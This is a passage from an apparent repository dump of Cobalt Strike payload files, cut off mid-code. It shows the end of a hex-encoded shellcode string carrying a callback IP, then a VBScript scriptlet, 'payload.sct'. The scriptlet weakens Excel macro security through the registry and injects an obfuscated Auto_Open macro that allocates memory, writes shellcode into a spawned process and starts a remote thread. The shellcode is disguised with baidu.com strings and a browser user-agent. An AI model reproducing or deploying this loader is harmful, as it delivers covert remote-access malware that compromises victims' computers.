x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\"\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.sct",
    "content": "<?XML version=\"1.0\"?>\n<scriptlet>\n\t<registration progid=\"e00684\" classid=\"{53cb5c98-fa0e-4378-99a4-8743642ed01d}\" >\n\t\t<script language=\"vbscript\">\n\t\t<![CDATA[\n\t\t\tDim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule\n\nSet objExcel = CreateObject(\"Excel.Application\")\nobjExcel.Visible = False\n\nSet WshShell = CreateObject(\"Wscript.Shell\")\n\nfunction RegExists(regKey)\n\ton error resume next\n\tWshShell.RegRead regKey\n\tRegExists = (Err.number = 0)\nend function\n\n' Get the old AccessVBOM value\nRegPath = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" & objExcel.Version & \"\\Excel\\Security\\AccessVBOM\"\n\nif RegExists(RegPath) then\n\taction = WshShell.RegRead(RegPath)\nelse\n\taction = \"\"\nend if\n\n' Weaken the target\nWshShell.RegWrite RegPath, 1, \"REG_DWORD\"\n\n' Run the macro\nSet objWorkbook = objExcel.Workbooks.Add()\nSet xlmodule = objWorkbook.VBProject.VBComponents.Add(1)\nxlmodule.CodeModule.AddFromString \"Private \"&\"Type PRO\"&\"CESS_INF\"&\"ORMATION\"&Chr(10)&\"    hPro\"&\"cess As \"&\"Long\"&Chr(10)&\"    hThr\"&\"ead As L\"&\"ong\"&Chr(10)&\"    dwPr\"&\"ocessId \"&\"As Long\"&Chr(10)&\"    dwTh\"&\"readId A\"&\"s Long\"&Chr(10)& _\n\"End Type\"&Chr(10)&Chr(10)&\"Private \"&\"Type STA\"&\"RTUPINFO\"&Chr(10)&\"    cb A\"&\"s Long\"&Chr(10)&\"    lpRe\"&\"served A\"&\"s String\"&Chr(10)&\"    lpDe\"&\"sktop As\"&\" String\"&Chr(10)&\"    lpTi\"&\"tle As S\"&\"tring\"& _\nChr(10)&\"    dwX \"&\"As Long\"&Chr(10)&\"    dwY \"&\"As Long\"&Chr(10)&\"    dwXS\"&\"ize As L\"&\"ong\"&Chr(10)&\"    dwYS\"&\"ize As L\"&\"ong\"&Chr(10)&\"    dwXC\"&\"ountChar\"&\"s As Lon\"&\"g\"&Chr(10)&\"    dwYC\"&\"ountChar\"& _\n\"s As Lon\"&\"g\"&Chr(10)&\"    dwFi\"&\"llAttrib\"&\"ute As L\"&\"ong\"&Chr(10)&\"    dwFl\"&\"ags As L\"&\"ong\"&Chr(10)&\"    wSho\"&\"wWindow \"&\"As Integ\"&\"er\"&Chr(10)&\"    cbRe\"&\"served2 \"&\"As Integ\"&\"er\"&Chr(10)&\"    lpRe\"& _\n\"served2 \"&\"As Long\"&Chr(10)&\"    hStd\"&\"Input As\"&\" Long\"&Chr(10)&\"    hStd\"&\"Output A\"&\"s Long\"&Chr(10)&\"    hStd\"&\"Error As\"&\" Long\"&Chr(10)&\"End Type\"&Chr(10)&Chr(10)&Chr(35)&\"If VBA7 \"&\"Then\"&Chr(10)& _\n\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion Cre\"&\"ateStuff\"&\" Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreateRe\"&\"moteThre\"&\"ad\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)& _\n\" ByVal l\"&\"pThreadA\"&\"ttribute\"&\"s As Lon\"&\"g\"&Chr(44)&\" ByVal d\"&\"wStackSi\"&\"ze As Lo\"&\"ng\"&Chr(44)&\" ByVal l\"&\"pStartAd\"&\"dress As\"&\" LongPtr\"&Chr(44)&\" lpParam\"&\"eter As \"&\"Long\"&Chr(44)&\" ByVal d\"& _\n\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpThrea\"&\"dID As L\"&\"ong\"&Chr(41)&\" As Long\"&\"Ptr\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion All\"&\"ocStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"& _\nChr(34)&\"VirtualA\"&\"llocEx\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"&\"pAddr As\"&\" Long\"&Chr(44)&\" ByVal l\"&\"Size As \"&\"Long\"&Chr(44)&\" ByVal f\"&\"lAllocat\"&\"ionType \"&\"As Long\"& _\nChr(44)&\" ByVal f\"&\"lProtect\"&\" As Long\"&Chr(41)&\" As Long\"&\"Ptr\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion Wri\"&\"teStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"WritePro\"& _\n\"cessMemo\"&\"ry\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"&\"Dest As \"&\"LongPtr\"&Chr(44)&\" ByRef S\"&\"ource As\"&\" Any\"&Chr(44)&\" ByVal L\"&\"ength As\"&\" Long\"&Chr(44)&\" ByVal L\"& _\n\"engthWro\"&\"te As Lo\"&\"ngPtr\"&Chr(41)&\" As Long\"&\"Ptr\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion Run\"&\"Stuff Li\"&\"b \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreatePr\"&\"ocessA\"&Chr(34)& _\n\" \"&Chr(40)&\"ByVal lp\"&\"Applicat\"&\"ionName \"&\"As Strin\"&\"g\"&Chr(44)&\" ByVal l\"&\"pCommand\"&\"Line As \"&\"String\"&Chr(44)&\" lpProce\"&\"ssAttrib\"&\"utes As \"&\"Any\"&Chr(44)&\" lpThrea\"&\"dAttribu\"&\"tes As A\"&\"ny\"& _\nChr(44)&\" ByVal b\"&\"InheritH\"&\"andles A\"&\"s Long\"&Chr(44)&\" ByVal d\"&\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpEnvir\"&\"onment A\"&\"s Any\"&Chr(44)&\" ByVal l\"&\"pCurrent\"&\"Director\"&\"y As Str\"&\"ing\"&Chr(44)& _\n\" lpStart\"&\"upInfo A\"&\"s STARTU\"&\"PINFO\"&Chr(44)&\" lpProce\"&\"ssInform\"&\"ation As\"&\" PROCESS\"&\"_INFORMA\"&\"TION\"&Chr(41)&\" As Long\"&Chr(10)&Chr(35)&\"Else\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion Cre\"& _\n\"ateStuff\"&\" Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreateRe\"&\"moteThre\"&\"ad\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"&\"pThreadA\"&\"ttribute\"&\"s As Lon\"&\"g\"&Chr(44)& _\n\" ByVal d\"&\"wStackSi\"&\"ze As Lo\"&\"ng\"&Chr(44)&\" ByVal l\"&\"pStartAd\"&\"dress As\"&\" Long\"&Chr(44)&\" lpParam\"&\"eter As \"&\"Long\"&Chr(44)&\" ByVal d\"&\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpThrea\"&\"dID As L\"& _\n\"ong\"&Chr(41)&\" As Long\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion All\"&\"ocStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"VirtualA\"&\"llocEx\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"& _\n\"s Long\"&Chr(44)&\" ByVal l\"&\"pAddr As\"&\" Long\"&Chr(44)&\" ByVal l\"&\"Size As \"&\"Long\"&Chr(44)&\" ByVal f\"&\"lAllocat\"&\"ionType \"&\"As Long\"&Chr(44)&\" ByVal f\"&\"lProtect\"&\" As Long\"&Chr(41)&\" As Long\"&Chr(10)& _\n\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion Wri\"&\"teStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"WritePro\"&\"cessMemo\"&\"ry\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"& _\n\"Dest As \"&\"Long\"&Chr(44)&\" ByRef S\"&\"ource As\"&\" Any\"&Chr(44)&\" ByVal L\"&\"ength As\"&\" Long\"&Chr(44)&\" ByVal L\"&\"engthWro\"&\"te As Lo\"&\"ng\"&Chr(41)&\" As Long\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion Run\"& _\n\"Stuff Li\"&\"b \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreatePr\"&\"ocessA\"&Chr(34)&\" \"&Chr(40)&\"ByVal lp\"&\"Applicat\"&\"ionName \"&\"As Strin\"&\"g\"&Chr(44)&\" ByVal l\"&\"pCommand\"&\"Line As \"&\"String\"&Chr(44)& _\n\" lpProce\"&\"ssAttrib\"&\"utes As \"&\"Any\"&Chr(44)&\" lpThrea\"&\"dAttribu\"&\"tes As A\"&\"ny\"&Chr(44)&\" ByVal b\"&\"InheritH\"&\"andles A\"&\"s Long\"&Chr(44)&\" ByVal d\"&\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpEnvir\"& _\n\"onment A\"&\"s Any\"&Chr(44)&\" ByVal l\"&\"pCurrent\"&\"Driector\"&\"y As Str\"&\"ing\"&Chr(44)&\" lpStart\"&\"upInfo A\"&\"s STARTU\"&\"PINFO\"&Chr(44)&\" lpProce\"&\"ssInform\"&\"ation As\"&\" PROCESS\"&\"_INFORMA\"&\"TION\"&Chr(41)& _\n\" As Long\"&Chr(10)&Chr(35)&\"End If\"&Chr(10)&Chr(10)&\"Sub Auto\"&\"_Open\"&Chr(40)&Chr(41)&Chr(10)&\"    Dim \"&\"myByte A\"&\"s Long\"&Chr(44)&\" myArray\"&\" As Vari\"&\"ant\"&Chr(44)&\" offset \"&\"As Long\"&Chr(10)&\"    Dim \"& _\n\"pInfo As\"&\" PROCESS\"&\"_INFORMA\"&\"TION\"&Chr(10)&\"    Dim \"&\"sInfo As\"&\" STARTUP\"&\"INFO\"&Chr(10)&\"    Dim \"&\"sNull As\"&\" String\"&Chr(10)&\"    Dim \"&\"sProc As\"&\" String\"&Chr(10)&Chr(10)&Chr(35)&\"If VBA7 \"& _\n\"Then\"&Chr(10)&\"    Dim \"&\"rwxpage \"&\"As LongP\"&\"tr\"&Chr(44)&\" res As \"&\"LongPtr\"&Chr(10)&Chr(35)&\"Else\"&Chr(10)&\"    Dim \"&\"rwxpage \"&\"As Long\"&Chr(44)&\" res As \"&\"Long\"&Chr(10)&Chr(35)&\"End If\"&Chr(10)& _\n\"    myAr\"&\"ray \"&Chr(61)&\" Array\"&Chr(40)&Chr(45)&\"4\"&Chr(44)&Chr(45)&\"24\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"96\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"27\"&Chr(44)&\"49\"& _\nChr(44)&Chr(45)&\"46\"&Chr(44)&\"100\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"48\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"12\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"20\"&Chr(44)&Chr(45)&\"117\"& _\nChr(44)&\"114\"&Chr(44)&\"40\"&Chr(44)&\"15\"&Chr(44)&Chr(45)&\"73\"&Chr(44)&\"74\"&Chr(44)&\"38\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&Chr(45)&\"84\"&Chr(44)&\"60\"&Chr(44)&\"97\"& _\nChr(44)&\"124\"&Chr(44)&\"2\"&Chr(44)&\"44\"&Chr(44)&\"32\"&Chr(44)&Chr(45)&\"63\"&Chr(44)&Chr(45)&\"49\"&Chr(44)&\" _\"&Chr(10)&\"13\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"57\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&Chr(45)&\"16\"&Chr(44)& _\n\"82\"&Chr(44)&\"87\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"16\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"66\"&Chr(44)&\"60\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"48\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"64\"&Chr(44)&\"120\"&Chr(44)& _\nChr(45)&\"123\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&\"116\"&Chr(44)&\"74\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"48\"&Chr(44)&\"80\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"72\"&Chr(44)&\"24\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"88\"&Chr(44)&\"32\"& _\nChr(44)&\"1\"&Chr(44)&Chr(45)&\"45\"&Chr(44)&Chr(45)&\"29\"&Chr(44)&\"60\"&Chr(44)&\"73\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"52\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"42\"&Chr(44)&\"49\"&Chr(44)& _\nChr(45)&\"1\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&Chr(45)&\"84\"&Chr(44)&Chr(45)&\"63\"&Chr(44)&Chr(45)&\"49\"&Chr(44)&\"13\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"57\"&Chr(44)&\"56\"&Chr(44)&Chr(45)&\"32\"&Chr(44)&\"117\"& _\nChr(44)&Chr(45)&\"12\"&Chr(44)&\"3\"&Chr(44)&\"125\"&Chr(44)&Chr(45)&\"8\"&Chr(44)&\"59\"&Chr(44)&\"125\"&Chr(44)&\"36\"&Chr(44)&\"117\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&\"88\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"88\"&Chr(44)&\"36\"& _\nChr(44)&\"1\"&Chr(44)&Chr(45)&\"45\"&Chr(44)&\"102\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"12\"&Chr(44)&\"75\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"88\"&Chr(44)&\"28\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"45\"&Chr(44)&Chr(45)&\"117\"&Chr(44)& _\n\"4\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"117\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"48\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&\"68\"&Chr(44)&\"36\"&Chr(44)&\"36\"&Chr(44)&\"91\"&Chr(44)&\"91\"&Chr(44)&\"97\"&Chr(44)&\"89\"&Chr(44)&\"90\"&Chr(44)& _\n\"81\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"32\"&Chr(44)&\"88\"&Chr(44)&\"95\"&Chr(44)&\"90\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"18\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&Chr(45)&\"122\"&Chr(44)&\"93\"&Chr(44)&\"104\"&Chr(44)&\"110\"& _\nChr(44)&\"101\"&Chr(44)&\"116\"&Chr(44)&\"0\"&Chr(44)&\"104\"&Chr(44)&\"119\"&Chr(44)&\"105\"&Chr(44)&\"110\"&Chr(44)&\"105\"&Chr(44)&\"84\"&Chr(44)&\"104\"&Chr(44)&\"76\"&Chr(44)&\"119\"&Chr(44)&\"38\"&Chr(44)&\"7\"&Chr(44)&Chr(45)& _\n\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"43\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"104\"&Chr(44)&\"58\"&Chr(44)&\"86\"&Chr(44)&\"121\"&Chr(44)&Chr(45)& _\n\"89\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"23\"&Chr(44)&Chr(45)&\"124\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"91\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"55\"&Chr(44)&\"81\"&Chr(44)&\"81\"&Chr(44)& _\n\"106\"&Chr(44)&\"3\"&Chr(44)&\"81\"&Chr(44)&\"81\"&Chr(44)&\"104\"&Chr(44)&\"36\"&Chr(44)&\"5\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"83\"&Chr(44)&\"80\"&Chr(44)&\"104\"&Chr(44)&\"87\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"97\"& _\nChr(44)&\" _\"&Chr(10)&Chr(45)&\"58\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&\"112\"&Chr(44)&\"91\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"46\"&Chr(44)&\"82\"&Chr(44)&\"104\"&Chr(44)&\"0\"&Chr(44)& _\n\"2\"&Chr(44)&\"96\"&Chr(44)&Chr(45)&\"124\"&Chr(44)&\"82\"&Chr(44)&\"82\"&Chr(44)&\"82\"&Chr(44)&\"83\"&Chr(44)&\"82\"&Chr(44)&\"80\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&\"85\"&Chr(44)&\"46\"&Chr(44)&\"59\"&Chr(44)&Chr(45)& _\n\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"58\"&Chr(44)&Chr(45)&\"125\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&\"80\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"106\"&Chr(44)& _\nChr(45)&\"1\"&Chr(44)&\"83\"&Chr(44)&\"86\"&Chr(44)&\" _\"&Chr(10)&\"104\"&Chr(44)&\"45\"&Chr(44)&\"6\"&Chr(44)&\"24\"&Chr(44)&\"123\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"123\"&Chr(44)&Chr(45)&\"64\"& _\nChr(44)&\"15\"&Chr(44)&Chr(45)&\"124\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&\"1\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"123\"&Chr(44)&Chr(45)&\"10\"&Chr(44)&\"116\"&Chr(44)&\"4\"&Chr(44)& _\nChr(45)&\"119\"&Chr(44)&Chr(45)&\"7\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&\"9\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"86\"&Chr(44)&Chr(45)&\"59\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&\"93\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)& _\nChr(45)&\"119\"&Chr(44)&Chr(45)&\"63\"&Chr(44)&\"104\"&Chr(44)&\"69\"&Chr(44)&\"33\"&Chr(44)&\"94\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"43\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"87\"& _\nChr(44)&\"106\"&Chr(44)&\"7\"&Chr(44)&\"81\"&Chr(44)&\"86\"&Chr(44)&\"80\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"73\"&Chr(44)&\"87\"&Chr(44)&Chr(45)&\"32\"&Chr(44)&\"11\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)& _\n\"65\"&Chr(44)&\"0\"&Chr(44)&\"47\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"57\"&Chr(44)&Chr(45)&\"57\"&Chr(44)&\"116\"&Chr(44)&Chr(45)&\"73\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"23\"&Chr(44)&Chr(45)&\"111\"&Chr(44)& _\n\"1\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&Chr(45)&\"23\"&Chr(44)&Chr(45)&\"55\"&Chr(44)&\"1\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&Chr(45)&\"24\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"1\"& _\nChr(44)&Chr(45)&\"1\"&Chr(44)&\"47\"&Chr(44)&\"119\"&Chr(44)&\"98\"&Chr(44)&\"78\"&Chr(44)&\"53\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"& _\nChr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)& _\n\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\" _\"&Chr(10)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)& _\n\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"& _\nChr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"& _\nChr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\" _\"&Chr(10)&\"105\"&Chr(44)&\"0\"&Chr(44)&\"85\"&Chr(44)&\"115\"&Chr(44)&\"101\"&Chr(44)&\"114\"&Chr(44)&\"45\"&Chr(44)&\"65\"&Chr(44)&\"103\"&Chr(44)&\"101\"&Chr(44)& _\n\"110\"&Chr(44)&\"116\"&Chr(44)&\"58\"&Chr(44)&\"32\"&Chr(44)&\"77\"&Chr(44)&\"111\"&Chr(44)&\"122\"&Chr(44)&\"105\"&Chr(44)&\"108\"&Chr(44)&\"108\"&Chr(44)&\"97\"&Chr(44)&\"47\"&Chr(44)&\"53\"&Chr(44)&\"46\"&Chr(44)&\"48\"&Chr(44)& _\n\"32\"&Chr(44)&\"40\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"112\"&Chr(44)&\"97\"&Chr(44)&\"116\"&Chr(44)&\"105\"&Chr(44)&\"98\"&Chr(44)&\"108\"&Chr(44)&\"101\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"77\"&Chr(44)& _\n\" _\"&Chr(10)&\"83\"&Chr(44)&\"73\"&Chr(44)&\"69\"&Chr(44)&\"32\"&Chr(44)&\"49\"&Chr(44)&\"48\"&Chr(44)&\"46\"&Chr(44)&\"48\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"87\"&Chr(44)&\"105\"&Chr(44)&\"110\"&Chr(44)&\"100\"&Chr(44)&\"111\"& _\nChr(44)&\"119\"&Chr(44)&\"115\"&Chr(44)&\"32\"&Chr(44)&\"78\"&Chr(44)&\"84\"&Chr(44)&\"32\"&Chr(44)&\"54\"&Chr(44)&\"46\"&Chr(44)&\"50\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"87\"&Chr(44)&\"105\"&Chr(44)&\"110\"&Chr(44)&\"54\"&Chr(44)& _\n\"52\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"120\"&Chr(44)&\"54\"&Chr(44)&\"52\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"84\"&Chr(44)&\"114\"&Chr(44)&\" _\"&Chr(10)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"101\"&Chr(44)&\"110\"&Chr(44)& _\n\"116\"&Chr(44)&\"47\"&Chr(44)&\"54\"&Chr(44)&\"46\"&Chr(44)&\"48\"&Chr(44)&\"41\"&Chr(44)&\"13\"&Chr(44)&\"10\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"& _\nChr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)& _\n\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)& 